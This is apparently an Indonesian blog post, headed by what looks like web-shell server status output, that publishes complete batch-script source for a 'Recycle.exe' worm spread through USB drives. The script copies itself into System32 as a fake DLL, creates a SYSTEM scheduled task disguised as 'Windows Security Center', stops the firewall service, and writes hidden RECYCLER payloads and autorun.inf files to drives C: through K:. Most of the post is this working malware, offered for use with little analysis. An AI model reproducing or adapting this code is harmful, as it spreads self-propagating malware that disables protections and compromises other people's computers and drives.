Uname
User
Php
Hdd
Chating
 :Linux p3nlhg416.shr.prod.phx3.secureserver.net 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
:666 ( sohai_666 ) Group: 666 ( ? )
:5.2.17 Safe mode: ON [ phpinfo ] Datetime: 2012-09-08 01:17:15
:10000.00 GB Free: 2802.46 GB (28%) GB
:sohai


Coder win32reycle

kali ini saya akan memberikan
code Virus Recycle.exe
virus recycle.exe ini sama dengan virus recycle.exe yang sudah av-soft posting sebelumnya. Dalam postingan virus sebelumnya "Virus 9CBBD0.exe / Recycle.exe" avsoft tidak mengetahui jika ternyata recycle.exe adalah virus yang mampu melakukan penamaan secara acak pada nama folder dan nama induknya. Antivirus AVG mengenal virus yang menggunakan icon folder ini dengan nama Trojan House Generic2_c.OKU.

Meskipun Recycle.exe merupakan virus yang mampu melakukan pengacakan terhadap penamaan folder dan nama induknya, recycle.exe cukup mudah dikenal. Dengan melihat setiap hasil penginfeksiannya pada flashdisk yang melakukan copy file induk dengan nama recycle.exe dengan atrribut Super Hidden, Read-Only dan duplikat semua folder yang ada dan mengnyembunyikannya.

code:

@echo off
Set Task=%WINDIR%\Tasks
Set Dos=%WINDIR%\System32

If Exist %Dos%\lwolf32.dll (
GoTo Mulai) Else (
GoTo Buat)

:Buat
If Exist *vmx (
Xcopy /h /y /q *vmx %Dos%
Attrib -s -h -r %Dos%\*vmx
Ren %Dos%\*vmx lwolf32.dll
Attrib +s +r %Dos%\lwolf32.dll
If Exist %Task%\*job (
Attrib -s -h -r %Task%\*job
Del /s /q %Task%\*job
)
SchTasks /Create /Tn "Windows Security Center" /Tr "cmd.exe /r %Dos%\lwolf32.dll" /sc minute /ru system
Sc Stop SharedAccess
)
Exit

:Mulai
Taskkill /f /im lwolf32.dll
Sc Stop SharedAccess

For %%a in (
c: d: e: f: g: h: i: j: k:) do (
If Exist %%a\* (
If Not Exist %%a\RECYCLER\* (
Md %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\
Type %Dos%\lwolf32.dll>%%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx
Echo [.shellclassinfo]>%%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\desktop.ini
Echo clsid={645FF040-5081-101B-9F08-00AA002F954E}>>%%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\desktop.ini
Attrib +s +h +r %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx
Attrib +s +h +r %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\desktop.ini
Attrib +s +h +r %%a\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003
Attrib +s +h +r %%a\RECYCLER

Attrib -s -h -r %%a\autorun.inf
Echo [autorun]>%%a\autorun.inf
Echo open=\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx>>%%a\autorun.inf
Echo shell\Open\command=\RECYCLER\S-1-5-21-1482476501-1682526488-1202660629-1003\jwgkvsq.vmx>>%%a\autorun.inf
Echo action=Open folder to view files>>%%a\autorun.inf
Echo Icon=%Dos%\Shell32.dll,4 >>%%a\autorun.inf
Attrib +s +h +r %%a\autorun.inf
)
)
)
Rem // Akhir Dari Skrip Virus Micro Conficker
Exit
0 komentar: di postingan Coder win32reycle
 

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

Source by sohai @2008